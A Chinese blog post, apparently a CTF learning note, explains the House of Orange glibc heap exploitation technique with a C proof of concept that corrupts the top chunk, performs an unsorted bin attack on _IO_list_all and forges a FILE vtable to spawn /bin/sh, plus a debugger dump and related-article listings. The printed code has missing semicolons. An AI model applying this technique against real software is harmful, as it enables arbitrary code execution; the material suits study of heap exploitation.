house of orange

最新推荐文章于 2024-07-22 14:15:06 发布
最新推荐文章于 2024-07-22 14:15:06 发布
阅读量125 收藏
点赞数 1
分类专栏: pwn 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62326489/article/details/126688157
版权

1利用方式

brk:对小块内存(小于 128K),C 标准库使用 brk() 来分配,也就是通过移动堆顶的位置来分配内存。这些内存释放后并不会立刻归还系统,而是被缓存起来,这样就可以重复使用。

 

2源码

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int winner ( char *ptr);
int main()
{
    char *p1, *p2;
    size_t io_list_all, *top;
    p1 = malloc(0x400-16);   
    top = (size_t *) ( (char *) p1 + 0x400 - 16);
    top[1] = 0xc01;
    p2 = malloc(0x1000)
    io_list_all = top[2] + 0x9a8;
    top[3] = io_list_all - 0x10;
    memcpy( ( char *) top, "/bin/sh\x00", 8);
    top[1] = 0x61;
    _IO_FILE *fp = (_IO_FILE *) top;
    fp->_mode = 0;
    fp->_IO_write_base = (char *) 2;
    fp->_IO_write_ptr = (char *) 3;
    size_t *jump_table = &top[12];
    jump_table[3] = (size_t) &winner
    *(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table;
    malloc(10);
    return 0;
}

int winner(char *ptr)
{
    system(ptr);
    return 0;
}

3用处

House of Orange是一种用来应对heap题中没有free的情况的方法,通过把top chunk的size改小,然后申请一个大于topchunk的size的chunk来把旧的top chunk放入bin中(可以是fastbin,也可以是unsortedbin),然后通过修改unstored进行攻击

p1 = malloc(0x400-16);

申请一个大小为0x400的堆块

top = (size_t *) ( (char *) p1 + 0x400 - 16);
    top[1] = 0xc01;

这里就是修改top chunk的大小,此时再申请一个堆块

p2 = malloc(0x1000);

就会将原来的top chunk free到unstored chunk中然后计算io list all的偏移值,_IO_list_all 跟 unsortedbin 的偏移是 0x9a8

io_list_all = top[2] + 0x9a8;
 top[3] = io_list_all - 0x10;

修改bk指针的指向位置到io_list_all

 memcpy( ( char *) top, "/bin/sh\x00", 8);
    top[1] = 0x61;

修改内容为bin sh,0x61 是因为这个大小属于 smallbin[4],并且它与 unsortedbin 的偏移,跟 _chain 与 io_list_all 的偏移一样

然后后面有一个检查:fp->_mode = 0、_IO_write_base 小于 _IO_write_ptr

fp->_mode = 0;
    fp->_IO_write_base = (char *) 2;
    fp->_IO_write_ptr = (char *) 3;

_IO_OVERFLOW 改为 system 函数的地址

size_t *jump_table = &top[12];
    jump_table[3] = (size_t) &winner;

然后io里

pwndbg> p *_IO_list_all
$1 = {
  file = {
    _flags = 0xfbad2086, 
    _IO_read_ptr = 0x0, 
    _IO_read_end = 0x0, 
    _IO_read_base = 0x0, 
    _IO_write_base = 0x0, 
    _IO_write_ptr = 0x0, 
    _IO_write_end = 0x0, 
    _IO_buf_base = 0x0, 
    _IO_buf_end = 0x0, 
    _IO_save_base = 0x0, 
    _IO_backup_base = 0x0, 
    _IO_save_end = 0x0, 
    _markers = 0x0, 
    _chain = 0x7ffff7dd2620 <_IO_2_1_stdout_>
    _fileno = 0x2, 
    _flags2 = 0x0, 
    _old_offset = 0xffffffffffffffff, 
    _cur_column = 0x0, 
    _vtable_offset = 0x0, 
    _shortbuf = "", 
    _lock = 0x7ffff7dd3770 <_IO_stdfile_2_lock>, 
    _offset = 0xffffffffffffffff, 
    _codecvt = 0x0, 
    _wide_data = 0x7ffff7dd1660 <_IO_wide_data_2>, 
    _freeres_list = 0x0, 
    _freeres_buf = 0x0, 
    __pad5 = 0x0, 
    _mode = 0x0, 
    _unused2 = '\000' <repeats 19 times>
  }, 
  vtable = 0x7ffff7dd06e0 <_IO_file_jumps>
}

把 io_list_all 的 vatble 改为我们想让他找的那个 jump_table

*(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table;

最后malloc(10),通过unstored attack进行攻击

这里的触发具有一定概率,1/2的可能性

 

名字被注册了诶
关注
专栏目录
the house of orange解析
小强的博客
11-24 2209
先以这个最简单的例子举例: https://github.com/shellphish/how2heap/blob/master/house_of_orange.c 编译生成ELF文件(64位) p1 = malloc(0x400-16); 每次创建堆都是从top chunk上切割堆块,由于top chunk默认是0x21000,因为我们已经申请了0x400大小的堆,所以此时to
boohkr:UofT MERN图书应用程序,用于搜索和保存图书及其信息以及Google图书中的数据
03-08
:house_with_garden: 提供非现成CSS外观,并保持直观 克隆和修补匠 在Garcila的Github上获取并制作为您的 :blue_book: :orange_book: :closed_book: :green_book: 。 屏幕截图 建于 -基于Chrome的V8 JavaScript引擎...
堆溢出-House of orange 学习笔记(看雪论坛)
happylzs2008的专栏
01-07 879
https://www.jianshu.com/p/4b0a73f321f9 前几天把House of orange重新学习了一下,比照着glibc malloc的源码好好分析了一下,希望做到真正做到知其然亦知其所以然,其中所做的笔记如下,可能描述上有点乱,大家将就着看一下吧。同时,我也发在了我个人博客上面 (http://blog.leanote.com/simp1e), 如果有错误的地方,...
CTFHub[技能树]-----House of orange
KaliLinux_V的博客
02-10 190
House of orange也是我第一次学,边学边做题,来来回回折腾了8小时,代码检查了一遍又一遍,没问题但总是打不成功,最后百度查了一下这个是概率成功,我哭了。白白浪费了这么久时间。
House of orange
tbsqigongzi的博客
08-07 985
题目中不存在 free 函数或其他释放堆块的函数。
House Of Orange
qq_45595732的博客
11-26 1010
House Of Orange 本质:Unsorted bin attack 和 FSOP造成的组合漏洞利用方式。 House of orange源于一道题目,有时候只用到free top chunk的题目也会被归入该类中。 glibc版本<=2.23情况 特点:不需要free操作 核心原理: 1,获取unsorted bin ​ 在_int_malloc函数中,会依次检验 fastbin、small bins、unsorted bin、large bins 是否可以满足分配要求,因为尺寸问
Hitcon CTF 2016 - house of orange 做题笔记
fa1c4的blog
03-31 1081
前言 深入学习pwn的高级堆利用方法, house of orange是绕不开的难关 之前已经接触了house系列题目, 不过由于心理压迫感, 所以迟迟没有开始调试house的漏洞 现在避无可避了, 于是准备集中精力突破掉house of orange 想要打过BOSS得先升级, 但是为了升级必须先打过BOSS (雾~ 分析过程 CTFhub和BUUCTF的题目有差别, 就按BUU来打吧 漏洞利用 总结 参考 ...
【PWN】House of Orange&House of Pig(待完整例题)
u014377094的博客
05-06 618
House of Orange House of Orange的利用背景在缺少free条件。为了达到free的效果,通过修改top chunk的size位,当malloc的空间大于top chunk时触发brk,使top chunk被放置在unsorted bin。 利用条件: 1.堆有 mmap 和 brk 两种分配方式,我们需要让堆以 brk 的形式拓展,之后原有的 top chunk 会被置于 unsorted bin 中。要实现 brk 拓展 top chunk,但是要实现这个目的需要绕过一.
House of orange & Unsortedbin Attack & FSOP
LDX的博客
12-12 82
HITCON 2016 houseoforange house系列经典例题
PWN技巧之_IO_FILE结构体利用house of orange
aptx4869_li的博客
02-16 1043
PWN技巧之_IO_FILE结构体利用house of orange
新目标英语七下U复习PPT课件.pptx
10-08
6. **餐厅服务用语**:"Can I help you = What can I do for you" 是服务员常问的开场白,"come and get your dumplings" 是提示顾客取餐的用语,"house of dumplings" 和 "dessert house" 分别是饺子店和甜品店的...
2014中考英语分类复习练习 名词部分配套练习
08-19
11. four bottles of orange juice (四瓶橘汁) 12. five cups of tea (五杯茶) 13. six bowls of rice (六碗米饭) 14. seven bags of rice (七袋米) 15. eight pieces of wood (八块木头) 16. nine pieces of metal ...
英语方位词练习PPT课件.pptx
10-14
3. “The blue box is next to/beside the orange box.”与“The blue box is opposite the orange one.”这两个句子进一步区分了“next to/beside”(相邻)和“opposite”(对面)的概念,帮助学习者理解它们在...
七年级英语上学期第一次月考试题(无答案) 鲁教版五四制 试题.doc
11-14
- 文章中的两家店,House of Hamburgers提供汉堡并有特定的电话号码,而Dessert House提供甜品和饮品。 综上所述,这份七年级英语上学期的月考试题涵盖了词汇、语法、阅读理解和数学应用等多个知识点,旨在测试...
12. Hibernate 模板设计模式
最新发布
这是一个web全栈开发的博客,取其精华去其糟粕,争取让大家一看就懂,一学就会,一用就成~
07-22 739
如何运用模板设计模式重构 Hibernate 操作流程;持久化对象与序列化接口;OOP中有一个编码原则 :写仅写一次。翻译过来就是,不要重复,要重用。答案是:使用模板设计模式进一步封装Hibernate的操作。在真实项目中,Hibernate仅仅只是完成项目中的一部分工作,需要和其它,如Spring等框架联合工作,一起承担整体项目的开发。Spring框架中就提供的有Hibernate模板对象。一个常规的、频繁的操作代码中,大部分代码不需要变动,只有小部分代码需要根据需求变动。
Promise 详解(原理篇)
山重水复疑无路,柳暗花明又一村。
07-20 693
Promise 是一种异步编程的解决方案。在异步操作中,callback 会导致回调地狱的问题,Promise 解决了这个问题。一个 Promise对象有以下三种状态:pending:初始状态,既不是成功,也不是失败状态。:意味着操作成功完成。rejected:意味着操作失败。当 new Promise() 被实例化后,即表示 Promise 进入 pending 初始化状态,准备就绪,等待运行。
Java内存模型
weixin_44267758的博客
07-19 712
此处的变量不是指java编程中的变量,它包括了实例字段,静态字段和构成数值对象的元素,但不包括局部变量和方法参数。JMM规定所有变量都存储在主内存中。每条线程有自己的工作内存,工作内存中保留了该线程使用到变量的主内存的副本。线程对变量的所有操作都必须在工作内存中进行,不能直接读写主内存的变量,不同的线程间也无法直接访问对方工作内存的变量,线程之间的变量值传递需要通过主内存来完成。
接口防刷!利用redisson快速实现自定义限流注解
架构师小吴的博客
07-18 1237
如登录接口,当用户使用手机号+验证码登录时,一般我们会生成6位数的随机验证码,并将验证码有效期设置为1-3分钟,如果对登录接口不加以限制,理论上,通过技术手段,快速重试100000次,即可将验证码穷举出来。解决思路:对登录接口加上限流操作,如限制一分钟内最多登录5次,登录次数过多,就返回失败提示,或者将账号锁定一段时间。在日常开发中,一些重要的对外接口,需要加上访问频率限制,以免造成资��损失。ok,通过以上两步,即可完成我们的限流注解了,下面通过一个接口验证下效果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值